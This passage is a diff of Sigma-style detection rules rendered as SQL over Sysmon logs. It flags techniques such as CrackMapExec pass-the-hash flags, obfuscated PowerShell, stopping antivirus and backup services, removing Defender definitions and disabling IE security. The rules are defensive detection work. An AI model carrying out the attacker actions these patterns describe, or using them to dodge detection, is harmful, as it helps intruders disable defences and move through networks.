- "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "title": "Use of UltraViewer Remote Access Software", + "id": "88656cec-6c3b-487c-82c0-f73ebb805503", "status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Command lines that use the same flags" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" }, { - "title": "Conhost Parent Process Executions", - "id": "7dc2dedd-7603-461a-bc13-15803d132355", + "title": "Potential Download/Upload Activity Using Type Command", + "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", "status": "experimental", - "description": "Detects the conhost execution as parent process. 
Can be used to evaded defense mechanism.", - "author": "omkar72", + "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND Image LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%type %' ESCAPE '\\' 
AND CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_conhost_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_type.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Suspicious Driver Install by pnputil.exe", + "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", + "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1574.008" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unknown" + "Pnputil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND Image LIKE '%\\\\pnputil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" }, { - "title": "Windows Defender Definition Files Removed", - "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", - "author": "frack113", + "title": "Potential Product Class Reconnaissance Via Wmic.EXE", + "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", + "status": "experimental", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% 
-RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% -All%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" + "filename": "proc_creation_win_wmic_recon_product_class.yml" }, { - "title": "Use of Scriptrunner.exe", - "id": "64760eef-87f7-4ed3-93fd-655668ea9420", - "status": "experimental", - "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", + "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", + "status": "test", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1218" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use when App-v is deployed" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_scriptrunner.yml" + "filename": 
"proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.t1489" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Administrators or tools shutting down the services due to upgrade or removal purposes. 
If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! 
Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE 
'%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE 
'%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL 
Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR 
CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Service StartupType Change Via Sc.EXE", - "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", - "status": "experimental", - "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "status": "test", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% 
config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_disable_service.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Suspicious Use of PsLogList", - "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% 
-u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + }, + { + "title": "Suspicious Regsvr32 Execution With Image Extension", + "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "status": "experimental", - "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Another tool that uses the command line switches of PsLogList", - "Legitimate use of PsLogList by an administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psloglist.exe' OR (Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' 
